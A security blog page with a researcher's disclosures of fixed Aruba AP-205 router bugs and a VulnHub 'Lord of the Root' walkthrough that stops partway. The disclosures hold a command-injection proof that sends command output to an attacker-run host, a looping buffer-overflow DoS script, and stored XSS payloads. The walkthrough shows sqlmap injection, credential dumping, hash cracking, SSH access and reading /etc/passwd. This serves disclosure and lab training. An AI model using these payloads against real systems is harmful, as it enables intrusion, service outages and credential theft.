Aruba Networks AP-205 (Multiple Vulnerabilities)

It’s been a while since I put out a new blog post, so I thought I’d share some insights into some older vulnerabilities I discovered while hacking on Aruba’s AP-205 wifi routers. Aruba was nice enough to ship out 2 FREE AP-205 devices to test and I ended up finding several vulnerabilities which paid out a total of ~$1,500. Not too shabby and I got to keep the routers after which was super cool of them! I’m releasing the technical details here purely for educational use. All of the vulnerabilities noted here have now been fixed. Enjoy! -1N3

Aruba AP-205 Remote Command Injection Vulnerability

Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $750.00

Aruba Networks AP-205 wireless routers suffer from remote command injection vulnerability in the WISPr input fields. This can be exploited by an attacker with authenticated access to the AP by crafting special escape character strings followed by standard linux commands. The Operator name, Location name and SSID/Zone fields are all vulnerable as seen by the below output. A permanent web backdoor could also be leveraged with time using the wget -O options to remotely grab a backdoor script from the attackers server and place locally in the web directory. PoC BLIND TIME BASED COMMAND EXECUTION:

wget http://192.168.1.145/test?`sleep 1`
RESULT: 1+ second delay in response time

wget http://192.168.1.145/test?`sleep 5`
RESULT: 5+ second delay in response time

wget http://192.168.1.145/test?`sleep 10`
RESULT: 10+ second delay in response time

REMOTE CONFIRMATION COMMAND EXECUTION:

; wget http://192.168.1.145/?`whoami`?`uname`?`pwd`
RESULT:
==> /var/log/apache2/crowdshield_access.log <==
192.168.1.148 - - [12/Aug/2015:19:56:09 -0400] "GET /?root?Linux?/aruba/bin HTTP/1.1" 200 7345 "-" "Wget"
192.168.1.148 - - [12/Aug/2015:19:56:09 -0400] "GET /?root?Linux?/aruba/bin, HTTP/1.1" 200 7345 "-" "Wget"
192.168.1.148 - - [12/Aug/2015:19:56:09 -0400] "GET /?root?Linux?/aruba/bin HTTP/1.1" 200 7345 "-" "Wget"

Aruba AP-205 Buffer Overflow Exploit (Memory Dislosure & DoS)

Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $150.00

The Aruba Networks AP-205 series is prone to a remote buffer overflow vulnerability because it fails to bounds-check user supplied input before copying it into an insufficiently sized memory buffer. Writing outside the bounds of a block of allocated memory results in a memory leak of sensitive details, denial of service and could lead to remote code execution. HTTP Request

HEAD / <INJECT LONG STRING UP TO 80900 BYTES HERE>
Host: instant.arubanetworks.com

Exploit Code PoC

#!/bin/bash
# Aruba Networks AP-205 Buffer Overflow Vulnerability
# Company: Aruba Networks
# Device Model: AP-205
# Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
# Researcher: 1N3 @ https://xerosecurity.com
# Date: 8/10/2015
#
# The Aruba Networks AP-205 series is prone to a remote buffer overflow
# vulnerability because it fails to bounds-check user-supplied input
# before copying it into an insufficiently sized memory buffer. Writing
# outside the bounds of a block of allocated memory results in a memory
# leak of sensitive details, denial of service and could lead to remote
# code execution.
#

TARGET="$1"

if [ -z $TARGET ]; then
echo "+ -- --=[Aruba Networks AP-205 Series BoF PoC by 1N3"
echo "+ -- --=[http://xerosecurity.com"
echo "+ -- --=[Usage: aruba_ap205_bof_poc "
echo ""
exit
fi

rm -f /tmp/buf
echo "HEAD / " `perl -e 'print "1"x80900'` > /tmp/buf
echo "Host: $TARGET" >> /tmp/buf
echo "" >> /tmp/buf
echo "Sending exploit..."
# cat /tmp/buf #DEBUG ONLY

for a in {1..1000};
do
cat /tmp/buf | ncat --ssl $TARGET 4343;
done

rm -f /tmp/buf

Screenshots
PoC Video

Walled Garden Stored DOM XSS

Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $150.00

Aruba Networks AP-205 wireless routers Walled Garden feature suffers from a stored DOM XSS vulnerability. Bug URL
https://192.168.1.148:4343/#home Affected Parameter
whitelist & blacklist input form fields Payload
“><iframe onload=alert(document.cookie)>

Captive Portal Stored DOM XSS

Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $150.00

Aruba Networks AP-205 wireless routers Captive Portal function suffers from a stored DOM XSS vulnerability. Bug URL
https://192.168.1.148:4343/#home Affected Parameter
title, welcome text and body text Payload
<iframe onload=prompt(1)> NOTE: This seems to only impact potential wifi guests connecting to the captive portal and may be intended functionality of the device.

DHCP Server Options Stored DOM XSS

Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $150.00

Aruba Networks AP-205 wireless routers DHCP Server Options function suffers from a stored DOM XSS vulnerability. Bug URL https://192.168.1.148:4343/#home Affected Parameter
vpn-scope-dhcp-option-valueX Payload
“><iframe onload=alert(document.cookie)></iframe>

SNMP Users Stored DOM XSS

Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $150.00

Aruba Networks AP-205 wireless routers SNMP Users function suffers from a stored DOM XSS vulnerability. Bug URL
https://192.168.1.148:4343/#home Affected Parameter
snmp-username Payload
<iframe onmouseover=prompt(1)>

Enterprise Domains Stored DOM XSS

Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $150.00

Aruba Networks AP-205 wireless routers Enterprise Domains function suffers from a stored DOM XSS vulnerability. Bug URL
https://192.168.1.148:4343/#home Affected Parameter
domain-name input field Payload
<img src=x onmouseover=alert(1)>

February 17, 2017 Bug Bounties, CVE's, Uncategorized No comments yet

VulnHub: Lord of the Root Solution

Greetingz! This is a quick and dirty solution for the Lord of the Root boot-to-root VM challenge. Enjoy! -1N3

DOWNLOAD

https://www.vulnhub.com/entry/lord-of-the-root-101,129/

DISCOVERY

# netdiscover -r 192.168.1.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                                                                  
 5 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 282                                                                                       
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                   
 ----------------------------------------------------------------------------- 
 192.168.1.101   00:0c:29:8c:bd:7b    01    042   VMware, Inc.

ENUMERATION

                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[http://xerosecurity.com
 + -- --=[sn1per v1.6 by 1N3

################################### Running recon #################################
Server:		206.248.154.22
Address:	206.248.154.22#53

** server can't find 101.1.168.192.in-addr.arpa: NXDOMAIN

Host 101.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN)

################################### Pinging host ###################################
PING 192.168.1.101 (192.168.1.101) 56(84) bytes of data.

--- 192.168.1.101 ping statistics ---
1 packets transmitted, 0 received, 100% packet loss, time 0ms


################################### Running port scan ##############################

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:00 EST
Nmap scan report for 192.168.1.101
Host is up (0.00026s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
|   2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
|_  256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
MAC Address: 00:0C:29:8C:BD:7B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 3.19, Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.25 ms 192.168.1.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.69 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:02 EST
Nmap scan report for 192.168.1.101
Host is up (0.00025s latency).
PORT     STATE         SERVICE      VERSION
53/udp   open|filtered domain
67/udp   open|filtered dhcps
68/udp   open|filtered dhcpc
88/udp   open|filtered kerberos-sec
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
139/udp  open|filtered netbios-ssn
161/udp  open|filtered snmp
| snmp-hh3c-logins: 
|_  baseoid: 1.3.6.1.4.1.25506.2.12.1.1.1
162/udp  open|filtered snmptrap
389/udp  open|filtered ldap
520/udp  open|filtered route
2049/udp open|filtered nfs
MAC Address: 00:0C:29:8C:BD:7B (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.25 ms 192.168.1.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.99 seconds

SSH BANNER

Since our only open port was SSH, I decided to ssh and see what options or hints were available…

[email protected]:~# ssh 192.168.1.101

                                                  .____    _____________________________
                                                  |    |   \_____  \__    ___/\______   \
                                                  |    |    /   |   \|    |    |       _/
                                                  |    |___/    |    \    |    |    |   \
                                                  |_______ \_______  /____|    |____|_  /
                                                          \/       \/                 \/
 ____  __.                     __     ___________      .__                   .___ ___________      ___________       __
|    |/ _| ____   ____   ____ |  | __ \_   _____/______|__| ____   ____    __| _/ \__    ___/___   \_   _____/ _____/  |_  ___________
|      <  /    \ /  _ \_/ ___\|  |/ /  |    __) \_  __ \  |/ __ \ /    \  / __ |    |    | /  _ \   |    __)_ /    \   __\/ __ \_  __ \
|    |  \|   |  (  <_> )  \___|    <   |     \   |  | \/  \  ___/|   |  \/ /_/ |    |    |(  <_> )  |        \   |  \  | \  ___/|  | \/
|____|__ \___|  /\____/ \___  >__|_ \  \___  /   |__|  |__|\___  >___|  /\____ |    |____| \____/  /_______  /___|  /__|  \___  >__|
        \/    \/            \/     \/      \/                  \/     \/      \/                           \/     \/          \/
Easy as 1,2,3

PORT KNOCKING

As the SSH banner hints at, it seems that we would need to use port knocking in order to unlock any other hidden services running on the target.

[email protected]:/pentest/loot# knock 192.168.1.101 1 2 3

[email protected]:/pentest/loot# sniper 192.168.1.101

                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[http://xerosecurity.com
 + -- --=[sn1per v1.6 by 1N3

################################### Running recon #################################
Server:		206.248.154.22
Address:	206.248.154.22#53

** server can't find 101.1.168.192.in-addr.arpa: NXDOMAIN

Host 101.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN)

################################### Pinging host ###################################
PING 192.168.1.101 (192.168.1.101) 56(84) bytes of data.

--- 192.168.1.101 ping statistics ---
1 packets transmitted, 0 received, 100% packet loss, time 0ms


################################### Running port scan ##############################

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:16 EST
Nmap scan report for 192.168.1.101
Host is up (0.00022s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
|   2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
|_  256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
1337/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:8C:BD:7B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 3.19, Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.22 ms 192.168.1.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.71 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:18 EST
Nmap scan report for 192.168.1.101
Host is up (0.00020s latency).
PORT     STATE         SERVICE      VERSION
53/udp   open|filtered domain
67/udp   open|filtered dhcps
68/udp   open|filtered dhcpc
88/udp   open|filtered kerberos-sec
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
139/udp  open|filtered netbios-ssn
161/udp  open|filtered snmp
| snmp-hh3c-logins: 
|_  baseoid: 1.3.6.1.4.1.25506.2.12.1.1.1
162/udp  open|filtered snmptrap
389/udp  open|filtered ldap
520/udp  open|filtered route
2049/udp open|filtered nfs
MAC Address: 00:0C:29:8C:BD:7B (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.20 ms 192.168.1.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.93 seconds

INTERESTING RESPONSE

Now that we have an open Apache server listening on 1337/tcp, I quickly discovered an interesting response in the 404 pages..

HTTP/1.1 404 Not Found
Date: Sat, 16 Jan 2016 00:01:17 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Fri, 18 Sep 2015 03:47:34 GMT
ETag: "74-51ffd64576fc7"
Accept-Ranges: bytes
Content-Length: 116
Connection: close
Content-Type: text/html

< html>
< img src="/images/hipster.jpg" align="middle">
< !--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
< /html>

DECODED MESSAGE

It seemed strange to have an encoded message in the HTML comments of the 404 page so I knew this was a hint and could likely be decoded. Sure enough, it appeared to be a double-encoded base64 string. 

THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh = Lzk3ODM0NTIxMC9pbmRleC5waHA= 

Lzk3ODM0NTIxMC9pbmRleC5waHA= = /978345210/index.php

LOGIN PAGE

Now that we decoded a message that seems to be reveal a hidden login page, the next obvious step was to either try some form of SQLi or auth bypass or brute force method to get further…

POST /978345210/index.php HTTP/1.1
Host: 192.168.1.101:1337
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.101:1337/978345210/index.php
Cookie: PHPSESSID=u3gjjtco6dqnq2c5peo530hbj3; BEEFHOOK=Ltt1x7RzZyuW6VnfdQu8dTM0zmXPpxe8Fgk6KjqhgU9KZzL4DptDN2KiVOyNsPTeiryahKYGwjIYTbbX
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

username=user&password=pass&submit=+Login+

HTTP/1.1 200 OK
Date: Fri, 15 Jan 2016 23:37:34 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 516
Connection: close
Content-Type: text/html

< !DOCTYPE html>
< html>
< head>
< title>LOTR Login!< /title>
< /head>
< body>
< div id="main">
< h1>Welcome to the Gates of Mordor< /h1>
< div id="login">
< form action="" method="post">
< label>User :< /label>
< input id="name" name="username" placeholder="username" type="text">< br>
< label>Password :< /label>
< input id="password" name="password" placeholder="**********" type="password">
< br>
< input name="submit" type="submit" value=" Login ">
< span>Username or Password is invalid< /span>
< /form>
< /div>
< /div>
< /body>
< /html>

SQL INJECTION VULNERABILITY

Scanning with Burpsuite quickly revealed that the login for was vulnerable to SQL injection.

SQL INJECTION EXPLOITATION

Using SQLMap, we can dig into the DB and see what else we can find.

[email protected]:~# sqlmap -u 'http://192.168.1.101:1337/978345210/index.php' --data='username=user&password=pass&submit=+Login+' --cookie='PHPSESSID=u3gjjtco6dqnq2c5peo530hbj3; BEEFHOOK=Ltt1x7RzZyuW6VnfdQu8dTM0zmXPpxe8Fgk6KjqhgU9KZzL4DptDN2KiVOyNsPTeiryahKYGwjIYTbbX' --level=5 --risk=3
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201601080a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:09:48

[19:09:48] [INFO] testing connection to the target URL
[19:09:48] [INFO] heuristics detected web page charset 'ascii'
[19:09:48] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[19:09:48] [INFO] testing if the target URL is stable
[19:09:49] [INFO] target URL is stable
[19:09:49] [INFO] testing if POST parameter 'username' is dynamic
[19:09:49] [WARNING] POST parameter 'username' does not appear dynamic
[19:09:49] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[19:09:49] [INFO] testing for SQL injection on POST parameter 'username'
[19:10:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:10:31] [INFO] POST parameter 'username' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[19:10:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:10:35] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
sqlmap got a 302 redirect to 'http://192.168.1.101:1337/978345210/profile.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
[19:10:43] [INFO] target URL appears to be UNION injectable with 1 columns
[19:10:43] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql') 
[19:10:43] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[19:10:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
[19:10:45] [INFO] testing 'Generic UNION query (random number) - 22 to 40 columns'
[19:10:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
[19:10:47] [INFO] testing 'Generic UNION query (random number) - 42 to 60 columns'
[19:10:48] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
[19:10:49] [INFO] testing 'Generic UNION query (random number) - 62 to 80 columns'
[19:10:50] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
[19:10:52] [INFO] testing 'Generic UNION query (random number) - 82 to 100 columns'
[19:10:53] [INFO] checking if the injection point on POST parameter 'username' is a false positive
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 5852 HTTP(s) requests:
---
Parameter: username (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: username=user' AND (SELECT * FROM (SELECT(SLEEP(5)))wUmu) AND 'mbXF'='mbXF&password=pass&submit= Login 
---
[19:13:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.12
[19:13:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.101'

[*] shutting down at 19:13:04





[email protected]:~# sqlmap -u 'http://192.168.1.101:1337/978345210/index.php' --data='username=user&password=pass&submit=+Login+' --cookie='PHPSESSID=u3gjjtco6dqnq2c5peo530hbj3; BEEFHOOK=Ltt1x7RzZyuW6VnfdQu8dTM0zmXPpxe8Fgk6KjqhgU9KZzL4DptDN2KiVOyNsPTeiryahKYGwjIYTbbX' --level=5 --risk=3 --all
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201601080a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:14:15

[19:14:16] [INFO] resuming back-end DBMS 'mysql' 
[19:14:16] [INFO] testing connection to the target URL
[19:14:16] [INFO] heuristics detected web page charset 'ascii'
sqlmap got a 302 redirect to 'http://192.168.1.101:1337/978345210/profile.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] y
[19:14:18] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: username=user' AND (SELECT * FROM (SELECT(SLEEP(5)))wUmu) AND 'mbXF'='mbXF&password=pass&submit= Login 
---
[19:14:18] [INFO] the back-end DBMS is MySQL
[19:14:18] [INFO] fetching banner
[19:14:18] [WARNING] time-based comparison requires larger statistical model, please wait..............................                                                                                                                
[19:14:19] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[19:14:39] [INFO] adjusting time delay to 1 second due to good response times
5.5.44-0ubuntu0.14.04.1
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL 5.0.12
banner:    '5.5.44-0ubuntu0.14.04.1'
[19:16:13] [INFO] fetching current user
[19:16:13] [INFO] retrieved: [email protected]
current user:    '[email protected]'
[19:17:23] [INFO] fetching current database
[19:17:23] [INFO] retrieved: Webapp
current database:    'Webapp'
[19:17:50] [INFO] fetching server hostname
[19:17:50] [INFO] retrieved: LordOfTheRoot
hostname:    'LordOfTheRoot'
[19:18:50] [INFO] testing if current user is DBA
[19:18:50] [INFO] fetching current user
current user is DBA:    True
[19:18:51] [INFO] fetching database users
[19:18:51] [INFO] fetching number of database users
[19:18:51] [INFO] retrieved: 5
[19:18:53] [INFO] retrieved: 'root'@'localhost'
[19:20:16] [INFO] retrieved: 'root'@'lordoftheroot'
[19:22:01] [INFO] retrieved: 'root'@'127.0.0.1'
[19:23:18] [INFO] retrieved: 'root'@'::1'
[19:24:10] [INFO] retrieved: 'debian-sys-maint'@'localhost'
database management system users [5]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'root'@'lordoftheroot'

[19:26:15] [INFO] fetching database users password hashes
[19:26:15] [INFO] fetching database users
[19:26:15] [INFO] fetching number of password hashes for user 'root'
[19:26:15] [INFO] retrieved: 1
[19:26:17] [INFO] fetching password hashes for user 'root'
[19:26:17] [INFO] retrieved: *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F
[19:28:32] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[19:28:32] [INFO] retrieved: 1
[19:28:33] [INFO] fetching password hashes for user 'debian-sys-maint'
[19:28:33] [INFO] retrieved: *A55A9B9049F69BC2768C9284615361DFBD580B34
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[19:31:27] [INFO] writing hashes to a temporary file '/tmp/sqlmapmR6GTw22036/sqlmaphashes-GwopYC.txt' 
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y
[19:31:32] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[19:31:34] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[19:31:38] [INFO] starting dictionary-based cracking (mysql_passwd)
[19:31:38] [INFO] starting 8 processes 
[19:31:40] [INFO] cracked password 'darkshadow' for user 'root'                        
database management system users password hashes:                                                                                                                                                                                      
[*] debian-sys-maint [1]:
    password hash: *A55A9B9049F69BC2768C9284615361DFBD580B34
[*] root [1]:
    password hash: *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F
    clear-text password: darkshadow

[19:35:14] [INFO] fetching database users privileges
[19:35:14] [INFO] fetching database users
[21:13:23] [INFO] fetching columns for table 'Users' in database 'Webapp'
[21:13:23] [INFO] retrieved: 3
[21:13:27] [INFO] retrieved: id
[21:13:37] [INFO] retrieved: username
[21:14:14] [INFO] retrieved: password
[21:14:56] [INFO] fetching entries for table 'Users' in database 'Webapp'
[21:14:56] [INFO] fetching number of entries for table 'Users' in database 'Webapp'
[21:14:56] [INFO] retrieved: 5
[21:14:59] [INFO] retrieved: 1
[21:15:03] [INFO] retrieved: iwilltakethering
[21:16:23] [INFO] retrieved: frodo
[21:16:51] [INFO] retrieved: 2
[21:16:55] [INFO] retrieved: MyPreciousR00t
[21:18:05] [INFO] retrieved: smeagol
[21:18:39] [INFO] retrieved: 3
[21:18:44] [INFO] retrieved: AndMySword
[21:19:32] [INFO] retrieved: aragorn
[21:20:05] [INFO] retrieved: 4
[21:20:10] [INFO] retrieved: AndMyBow
[21:20:45] [INFO] retrieved: legolas
[21:21:20] [INFO] retrieved: 5
[21:21:24] [INFO] retrieved: AndMyAxe
[21:21:57] [INFO] retrieved: gimli
[21:22:20] [INFO] analyzing table dump for possible password hashes
Database: Webapp
Table: Users
[5 entries]
+----+----------+------------------+
| id | username | password         |
+----+----------+------------------+
| 1  | frodo    | iwilltakethering |
| 2  | smeagol  | MyPreciousR00t   |
| 3  | aragorn  | AndMySword       |
| 4  | legolas  | AndMyBow         |
| 5  | gimli    | AndMyAxe         |
+----+----------+------------------+

[21:22:20] [INFO] table 'Webapp.Users' dumped to CSV file '/root/.sqlmap/output/192.168.1.101/dump/Webapp/Users.csv'

SSH LOGIN

Now that we have lots of credentials and clear-text passwords, the next obvious route was to re-try logging in with the accounts over SSH…

[email protected]:~# ssh [email protected]

                                                  .____    _____________________________
                                                  |    |   \_____  \__    ___/\______   \
                                                  |    |    /   |   \|    |    |       _/
                                                  |    |___/    |    \    |    |    |   \
                                                  |_______ \_______  /____|    |____|_  /
                                                          \/       \/                 \/
 ____  __.                     __     ___________      .__                   .___ ___________      ___________       __
|    |/ _| ____   ____   ____ |  | __ \_   _____/______|__| ____   ____    __| _/ \__    ___/___   \_   _____/ _____/  |_  ___________
|      <  /    \ /  _ \_/ ___\|  |/ /  |    __) \_  __ \  |/ __ \ /    \  / __ |    |    | /  _ \   |    __)_ /    \   __\/ __ \_  __ \
|    |  \|   |  (  <_> )  \___|    <   |     \   |  | \/  \  ___/|   |  \/ /_/ |    |    |(  <_> )  |        \   |  \  | \  ___/|  | \/
|____|__ \___|  /\____/ \___  >__|_ \  \___  /   |__|  |__|\___  >___|  /\____ |    |____| \____/  /_______  /___|  /__|  \___  >__|
        \/    \/            \/     \/      \/                  \/     \/      \/                           \/     \/          \/
Easy as 1,2,3
[email protected]'s password: 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)

 * Documentation:  https://help.ubuntu.com/

                            .____    _____________________________                              
                            |    |   \_____  \__    ___/\______   \                             
                            |    |    /   |   \|    |    |       _/                             
                            |    |___/    |    \    |    |    |   \                             
                            |_______ \_______  /____|    |____|_  /                             
                                    \/       \/                 \/                              
 __      __       .__                                ___________      .__                   .___
/  \    /  \ ____ |  |   ____  ____   _____   ____   \_   _____/______|__| ____   ____    __| _/
\   \/\/   // __ \|  | _/ ___\/  _ \ /     \_/ __ \   |    __) \_  __ \  |/ __ \ /    \  / __ | 
 \        /\  ___/|  |_\  \__(  <_> )  Y Y  \  ___/   |     \   |  | \/  \  ___/|   |  \/ /_/ | 
  \__/\  /  \___  >____/\___  >____/|__|_|  /\___  >  \___  /   |__|  |__|\___  >___|  /\____ | 
       \/       \/          \/            \/     \/       \/                  \/     \/      \/ 
Last login: Tue Sep 22 12:59:38 2015 from 192.168.55.135
[email protected]:~$ ls
Desktop  Documents  Downloads  examples.desktop  Music  Pictures  Public  Templates  Videos
[email protected]:~$ uname -a
Linux LordOfTheRoot 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux
[email protected]:~$ sudo su
[sudo] password for smeagol: 
smeagol is not in the sudoers file.  This incident will be reported.


[email protected]:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
